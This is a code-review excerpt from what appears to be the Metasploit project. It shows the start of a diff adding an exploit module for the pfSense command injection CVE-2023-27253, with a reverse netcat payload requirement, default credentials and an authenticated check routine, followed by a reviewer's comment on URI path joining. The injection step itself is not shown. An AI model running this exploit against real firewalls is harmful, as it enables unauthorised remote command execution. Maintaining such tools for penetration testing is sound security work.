modules/exploits/unix/http/pfsense_config_data_exec.rb

```diff
@@ -0,0 +1,174 @@
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'pfSense Restore RRD Data Command Injection',
+        'Description' => %q{
+          This module exploits an OS Command Injection vulnerability in the pfSense
+          Config Module (CVE-2023-27253). The vulnerability affects versions <= 2.7.0
+          and can be exploited by an authenticated user if they have the
+          "WebCfg - Diagnostics: Backup & Restore" privilege.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Emir Polat', # vulnerability discovery & metasploit module
+        ],
+        'References' => [
+          ['CVE', '2023-27253'],
+          ['URL', 'https://redmine.pfsense.org/issues/13935']
+        ],
+        'DisclosureDate' => '2023-03-18',
+        'Platform' => ['unix'],
+        'Arch'           => [ ARCH_CMD ],
+        'Privileged' => true,
+        'Targets'        =>
+          [
+            [ 'Automatic Target', {}]
+          ],
+        'Payload'        =>
+          {
+            'Space'       => 1024,
+            'BadChars'    => "\x2F\x27",
+            'DisableNops' => true,
+            'Compat'      =>
+              {
+                'PayloadType' => 'cmd',
+                'RequiredCmd' => 'reverse netcat'
+              }
+          },
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'DefaultTarget' => 0
+      )
+    )
+
+    register_options [
+                       OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']),
+                       OptString.new('PASSWORD', [true, 'Password to authenticate with', 'pfsense'])
+                     ]
+
+  end
+
+
+  def check
+    csrf = get_csrf('index.php', nil, 'GET')
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path + 'index.php'),
+      'method' => 'POST',
+      'vars_post' => {
+        '__csrf_magic' => csrf,
+        'usernamefld' => datastore['USERNAME'],
+        'passwordfld' => datastore['PASSWORD'],
+        'login' => ''
+      }
+    )
+
+    @auth_cookies = res.get_cookies
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path + 'diag_backup.php'),

```

Comment:
One of the reasons to call `normalize_uri` is to strip double slashes. This let's us always preface appended paths with a `/` knowing that it will be stripped if it is not required. Otherwise, if the user sets a `TARGETURI` that does not have a trailing `/`, this code will break.

```suggestion
      'uri' => normalize_uri(target_uri.path, '/diag_backup.php'),
```

This comment applies to other users of `normalize_uri` in this module too.